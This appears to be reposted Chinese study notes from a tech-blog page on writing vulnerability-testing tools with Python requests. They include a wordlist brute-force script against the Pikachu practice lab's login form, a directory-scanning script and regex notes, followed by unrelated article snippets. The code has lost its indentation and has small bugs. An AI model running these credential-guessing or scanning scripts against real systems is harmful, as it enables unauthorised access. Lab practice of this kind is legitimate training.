requests模块编写漏洞检测工具

#尝试使用python登录pikachu爆破模块
#发送post数据包,包含用户名密码,对接受到的响应进行判断,如何为登录成功
#爆破密码
with open('passwor.txt','r') as f:
password=f.readlines()
for i in password:
data = {'username': 'admin', 'password': i, "submit": "Login"}
proxy = {"http": "127.0.0.1:8080", "https": "127.0.0.1:8080"}
url = "http://192.168.10.128:806/vul/burteforce/bf_form.php"
r = requests.post(url=url, data=data, proxies=proxy)
r.encoding = "utf-8"
if "login success" in r.text:
print("登录成功")
print("密码:",i)
#既爆破密码又爆破用户名
#split('\n')[0],基于\n进行字符串拆分,并取出第一位
with open('passwor.txt','r') as f:
password=f.readlines()
with open('user.txt','r') as p:
username=p.readlines()
for j in username:
for i in password:
data = {'username': j.split('\n')[0], 'password': i.split('\n')[0],
"submit": "Login"}
proxy = {"http": "127.0.0.1:8080", "https": "127.0.0.1:8080"}
url = "http://192.168.10.128:806/vul/burteforce/bf_form.php"
r = requests.post(url=url, data=data, proxies=proxy)
r.encoding = "utf-8"
if "login success" in r.text:
print("登录成功")
print("用户名",j,"密码:", i)
break
break
#如何目录扫描
#基于requests发送数据包拼接url即可
#stat_code,200存在,403存在,404不存在
#如何目录扫描,如何将扫出来的结果汇总成一个文件,txt格式即可,扫描的网站由自己定义
inurl=input("输入要扫描的网站:\n")
resfile=inurl.split('://')[1]+'res.txt'
with open('PHP.txt','r') as f:
dic=f.readlines()
for i in dic:
url=inurl+i.split('\n')[0]
r=requests.head(url=url,proxies=proxy)
if r.status_code==200 or r.status_code==403:
with open(file=resfile,mode='a') as p:
p.write(i)
p.close()
print(i+'文件&目录存在')
else:
pass
#看dirsearch的源码
数据筛选
re 模块,正则
常用方法
match 匹配以某个规则开头的字符串
# 字符串未以 g 开头则未匹配
search 匹配字符于字符串中的任意位置
只要出现 g 就匹配
findall
和匹配所有, search 仅一次
text =
"""Ross McFluff: 834.345.1254 155 Elm Street
Ronald Heathmore: 892.345.3428 436 Finley Avenue
Frank Burger: 925.541.7625 662 South Dogwood Way
Heather Albrecht: 548.326.4584 919 Park Place
"""

split 基于匹配规则将字符串打撒塞进列表中
IGNORECASE 忽略大小写
compile
sub
match.groups 将匹配结果塞进元组中
match.groupdict 将匹配结果塞进列表中
正则表达式 .* 默认为贪婪匹配,尽可能多的匹配数据
可使用?切换为非贪婪模式
此刻仅匹配第一组 td 标签所包裹的数据

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/bicheng/22067.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

数据结构——算法和算法效率的度量

目录 一、引言 二、算法 1 算法的基本概念 2 算法的复杂度 2.1 时间复杂度 2.1.1 概念 2.1.2 大O的渐进表示 3 算法的空间复杂度 3.1 概念 3.2 实例 4 实例分析 5 结论 一、引言 大家在写代码的时候有没有发现写同样功能的代码有多种不同的写法,而不同的代…

51种企业应用架构模式详解

01 什么是企业应用 我的职业生涯专注于企业应用,因此,这里所谈及的模式也都是关于企业应用的。(企业应用还有一些其他的说法,如“信息系统”或更早期的“数据处理”。)那么,这里的“企业应用”具体指的是什…

[原型资源分享]经典产品饿了么UI模版部件库

​部件库预览链接:https://f13gm0.axshare.com 支持版本: Axrure RP 8 文件大小: 3MB 文档内容介绍 基本部件:表单样式:12款、数据样式:10款、服务样式:6款、导航:5款、业务组件:7款、 模板…

python把简体中文转换为繁体中文

Python 可以使用第三方库来将简体中文(简体中文)转换为繁体中文(繁体中文)。一个常用的库是 opencc-python-reimplemented,它是 Open Chinese Convert (OpenCC) 的 Python 实现,OpenCC 是一个开源的中文简繁…

MySQL之查询性能优化(三)

查询性能优化 重构查询的方式 在优化有问题的查询时,目标应该是找到一个更优的方法获得实际需要的记过——而不是一定总是需要从MySQL获取一模一样的结果集。有时候,可以将查询转换一种写法让其返回一样的结果,但是性能更好。但也可以通过修…

Python魔法之旅-魔法方法(14)

目录 一、概述 1、定义 2、作用 二、应用场景 1、构造和析构 2、操作符重载 3、字符串和表示 4、容器管理 5、可调用对象 6、上下文管理 7、属性访问和描述符 8、迭代器和生成器 9、数值类型 10、复制和序列化 11、自定义元类行为 12、自定义类行为 13、类型检…

在Debian系统上赋予普通用户ping 权限

在Debian系统上,普通用户默认情况下没有权限使用 ping 命令,因为它需要发送 ICMP 包,这通常需要 root 权限。为了允许普通用户使用 ping,可以设置 ping 命令的 setuid 位。以下是具体的步骤: 查找 ping 命令的位置&am…

2024年度自贡市社会民生重大科技计划项目申报要求、时间流程

一、申报要求 申报项目需符合以下申报要求和申报指南要求,申报资料需在“自贡市科技综合业务服务平台”中的“自贡市重点科技计划项目管理系统”上传。 (一)项目申报单位要求。 1.项目申报单位包括项目牵头单位和项目合作单位。 2.多家单…

【Python】pyinstaller打包时添加详细信息

在要被打包的py文件同级目录新建version.txt,写入以下内容 # UTF-8 # # For more details about fixed file info ffi see: # http://msdn.microsoft.com/en-us/library/aa381058.aspx # VSVersionInfo(ffiFixedFileInfo(filevers(1, 4, 0, 5),prodvers(1, 4, 0, 5…

SpringBoot使用RabbitMQ实现延迟队列

SpringBoot使用RabbitMQ实现延迟队列 需求和目标名词解释实现方式引入依赖添加配置文件配置类死信队列消费者即时队列消费者延迟消息发送结果注意 需求和目标 商城系统,用户下单后若15分钟内仍未完成支付,则自动取消订单,若已支付&#xff0c…

重组蛋白的定量定性方法,你了解吗?

重组蛋白的定量和定性分析是蛋白质工程和生物技术中至关重要的步骤,用于确保蛋白质的表达、纯度和功能性符合预期。以下是小编整理的一些常用的方法以及实验介绍,希望这些方法帮助研究人员详细了解重组蛋白的特性。 主要的定性方法 1 WB(Wes…

AIGC 011-SAM第一个图像分割大模型-分割一切!

AIGC 011-SAM第一个图像分割大模型-分割一切! 文章目录 0 论文工作1论文方法2 效果 0 论文工作 这篇论文介绍了 Segment Anything (SA) 项目,这是一个全新的图像分割任务、模型和数据集。SA 项目是一个具有里程碑意义的工作,它为图像分割领域…

基于springboot的多媒体素材库源码数据库

基于springboot的多媒体素材库源码数据库 近年来,信息化管理行业的不断兴起,使得人们的日常生活越来越离不开计算机和互联网技术。首先,根据收集到的用户需求分析,对设计系统有一个初步的认识与了解,确定多媒体素材库…

迎七一党史知识竞赛答题怎么做

迎七一党史知识竞赛答题,不仅是对于党史知识的检验,更是对于参赛者学习态度和综合能力的考量。在参与这类竞赛时,我们需要做好充分的准备,掌握一定的答题技巧,才能取得好的成绩。 首先,我们要深入了解竞赛…

FFmpeg播放器的相关概念【1】

播放器框架 相关术语 •容器/文件(Conainer/File):即特定格式的多媒体文件,比如mp4、flv、mkv等。 • 媒体流(Stream):表示时间轴上的一段连续数据,如一段声音数据、一段…

UFS Explorer Professional Recovery: 如何从启用了 mSATA 缓存的 Drobo 设备中恢复数据

天津鸿萌科贸发展有限公司是 UFS Explorer Professional Recovery 数据恢复软件的授权代理商。 UFS Explorer Professional Recovery 数据恢复软件提供综合性的解决方案,用于解决复杂的数据恢复案例,包括那些采用特殊存储技术的案例,或介质受…

上海亚商投顾:创业板指震荡收涨 超70家ST股跌停

上海亚商投顾前言:无惧大盘涨跌,解密龙虎榜资金,跟踪一线游资和机构资金动向,识别短期热点和强势个股。 一.市场情绪 沪指昨日震荡震荡,创业板指走势稍强,盘中一度涨超1%,黄白二线分化严重。算…

vue ts 导入 @/assets/ 红色显示的问题解决

vue ts 导入 /assets/ 红色显示的问题解决 一、问题描述 在使用的时候这样导入会出现如上的错误。 在使用的时候,导入的类型也没有对应的代码提示,说明导入有问题。 二、解决 在 tsconfig.json 中添加如下内容: {"compilerOptions&…

AI大模型探索之路-实战篇15: Agent智能数据分析平台之整合封装Tools和Memory功能代码

系列篇章💥 AI大模型探索之路-实战篇4:深入DB-GPT数据应用开发框架调研 AI大模型探索之路-实战篇5:探索Open Interpreter开放代码解释器调研 AI大模型探索之路-实战篇6:掌握Function Calling的详细流程 AI大模型探索之路-实战篇7…

模式识别判断题

贝叶斯估计的方法类似于贝叶斯决策,也需要定义损失函数。(正确) 解释:贝叶斯估计是一种基于贝叶斯定理的参数估计方法,它在估计参数时考虑了参数的先验分布。与贝叶斯决策类似,贝叶斯估计也需要定义损失函数…